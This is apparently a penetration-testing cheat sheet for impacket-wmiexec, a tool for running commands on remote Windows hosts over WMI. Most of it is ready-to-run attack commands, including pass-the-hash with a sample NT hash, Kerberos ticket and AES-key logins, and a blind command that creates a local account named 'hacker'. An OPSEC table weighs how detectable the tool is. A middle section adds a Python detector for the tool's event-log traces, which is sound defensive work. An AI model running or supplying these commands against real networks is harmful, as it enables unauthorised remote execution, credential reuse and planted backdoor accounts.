
Overview

impacket-wmiexec executes commands on a remote host using Windows Management Instrumentation (WMI) over DCOM (port 135 + dynamic high ports). It provides a semi-interactive shell without uploading any binary or creating a service. Output is retrieved by writing to a temp file on a writable share.

Authentication Methods

Method      Flag          Example
Password    (default)     domain/user:password@target
NTLM hash   -hashes       -hashes :NT_HASH
Kerberos    -k -no-pass   -k -no-pass -dc-ip DC_IP
AES key     -aesKey       -aesKey AES256_KEY

Basic Usage — Interactive Shell

impacket-wmiexec domain.local/administrator:[email protected]
Local admin (no domain):
impacket-wmiexec ./administrator:[email protected]

Execute Specific Command

impacket-wmiexec domain.local/administrator:[email protected] "whoami"
Run a PowerShell command:
impacket-wmiexec domain.local/administrator:[email protected] "powershell -c Get-Process"

How It Works

  1. Authenticates to the target via DCOM/RPC (port 135).
  2. Negotiates a dynamic high port for WMI communication.
  3. Creates a Win32_Process via WMI to execute cmd.exe /Q /c <command>.
  4. Command output is redirected to a temp file at the root of the ADMIN$ share (e.g., C:\Windows\__<timestamp>, since ADMIN$ maps to C:\Windows) — not under \Temp.
  5. Reads the output file over SMB (port 445) and returns it to the attacker.
  6. Deletes the temp output file after reading.
The shell runs as the authenticated user (not SYSTEM, unless authenticating as SYSTEM-equivalent).

OPSEC Considerations

Indicator          Detail
Service creation   None — no service is installed
Binary on disk     None — no executable uploaded
Temp files         Writes output to ADMIN$ share (short-lived)
Event logs         Process creation (4688), WMI activity (5857, 5860, 5861)
Detection          Stealthier than psexec — no service artifacts
Noise level        Medium — temp file writes and DCOM activity are detectable
Artifacts to expect:
  • Security Event ID 4624 (network logon type 3)
  • Security Event ID 4688 (process creation for cmd.exe)
  • WMI Operational Event IDs 5857, 5860, 5861
  • Temp files briefly written to the root of the share (default ADMIN$, i.e. C:\Windows\__<timestamp>)
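The artifacts listed above can be turned into a host-side detection. The following added example (not part of this page or of impacket) triages constructed Windows Security event records: it flags a 4688 process-creation record where cmd.exe is spawned by the WMI provider host with the wmiexec-style "/Q /c ... 1> \\127.0.0.1\<share>\__<timestamp> 2>&1" redirect, and a 5145 detailed-file-share record (auditing assumed enabled) for the short-lived __<timestamp> output file at the share root. The exact redirect form and the 5145 field names are assumptions to adapt to your own telemetry.

```python
import re
from typing import Dict, List

# Command line wmiexec hands to Win32_Process.Create: cmd.exe /Q /c <command> with
# output redirected to __<timestamp> at the share root. Assumption: the redirect
# target has the form \\127.0.0.1\<share>\__<epoch>; adjust if telemetry normalises paths.
WMIEXEC_CMDLINE = re.compile(r"cmd(?:\.exe)?\s+/Q\s+/c\s+.*?1>\s*\\\\\S+\\__\d+(?:\.\d+)?\s+2>&1", re.I)
# Name of the short-lived output file as seen in RelativeTargetName of Event ID 5145
# (detailed file share auditing, assumed enabled on the host).
OUTPUT_FILE = re.compile(r"^__\d+(?:\.\d+)?$")

def is_wmiexec_process(event: Dict[str, str]) -> bool:
    """4688 record: cmd.exe spawned by the WMI provider host (WmiPrvSE.exe) with the
    wmiexec redirect. Both signals must be present to keep false positives low."""
    if event.get("EventID") != "4688":
        return False
    parent = event.get("ParentProcessName", "").lower()
    return parent.endswith("wmiprvse.exe") and bool(WMIEXEC_CMDLINE.search(event.get("CommandLine", "")))

def is_wmiexec_output_file(event: Dict[str, str]) -> bool:
    """5145 record: a __<timestamp> file touched at the root of a share over SMB."""
    if event.get("EventID") != "5145":
        return False
    return bool(OUTPUT_FILE.match(event.get("RelativeTargetName", "")))

def triage(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert string per matching event, in input order."""
    alerts = []
    for e in events:
        if is_wmiexec_process(e):
            alerts.append(f"wmiexec process on {e.get('Computer')}: {e['CommandLine']}")
        elif is_wmiexec_output_file(e):
            alerts.append(f"wmiexec output file on {e.get('Computer')}: {e.get('ShareName')}\\{e['RelativeTargetName']}")
    return alerts

# Constructed sample records (not real telemetry)
SAMPLE_EVENTS = [
    {"EventID": "4688", "Computer": "WS01", "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.1234 2>&1"},
    {"EventID": "4688", "Computer": "WS01", "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    {"EventID": "5145", "Computer": "WS01", "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "__1700000000.1234"},
    {"EventID": "5145", "Computer": "WS01", "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"Temp\report.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Pairing the two signals with the 4624 type-3 logon from the same source address, within the same few seconds, gives a much higher-confidence alert than either record alone.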

Pass-the-Hash

impacket-wmiexec -hashes :64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]
With both LM and NT hash:
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]

Kerberos Authentication

Requires a valid ccache file or keytab.
export KRB5CCNAME=/tmp/administrator.ccache
impacket-wmiexec -k -no-pass domain.local/[email protected]
With explicit DC IP:
impacket-wmiexec -k -no-pass -dc-ip 10.10.10.1 domain.local/[email protected] -target-ip 10.10.10.5
Using AES key directly:
impacket-wmiexec -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc domain.local/[email protected] -k -no-pass

Specify Output Share

By default, output goes to ADMIN$. Use a different share:
impacket-wmiexec -share C$ domain.local/administrator:[email protected]
Use a custom share (useful when ADMIN$ is restricted):
impacket-wmiexec -share SHARE_NAME domain.local/administrator:[email protected]
Disable output file (blind execution, no output returned):
impacket-wmiexec -nooutput domain.local/administrator:[email protected] "net user hacker P@ss123 /add"

Common Errors and Fixes

Error                                Cause                                    Fix
DCOM connection failed               Port 135 or dynamic high ports blocked   Check firewall rules for RPC/DCOM
STATUS_ACCESS_DENIED                 User lacks WMI/DCOM permissions          Verify DCOM Launch and Access permissions
rpc_s_access_denied                  Restricted RPC access                    User needs local admin or explicit WMI permissions
No output returned                   ADMIN$ share not accessible              Try -share C$ or another writable share
KDC_ERR_PREAUTH_FAILED               Wrong password or expired ticket         Verify creds, regenerate ccache
SessionError: STATUS_LOGON_FAILURE   Incorrect credentials                    Double-check password/hash
Timeout / hangs                      Dynamic RPC port negotiation blocked     Ensure high ports (49152-65535) are reachable

Quick Reference

# Interactive shell with password
impacket-wmiexec domain.local/user:pass@TARGET

# Interactive shell with hash (pass-the-hash)
impacket-wmiexec -hashes :NTHASH domain.local/user@TARGET

# Interactive shell with Kerberos
export KRB5CCNAME=/tmp/user.ccache
impacket-wmiexec -k -no-pass domain.local/user@TARGET_FQDN

# Run single command
impacket-wmiexec domain.local/user:pass@TARGET "ipconfig /all"

# Blind execution (no output)
impacket-wmiexec -nooutput domain.local/user:pass@TARGET "cmd /c <command>"

# Use alternate output share
impacket-wmiexec -share C$ domain.local/user:pass@TARGET

# With explicit DC for Kerberos
impacket-wmiexec -k -no-pass -dc-ip DC_IP domain.local/user@TARGET_FQDN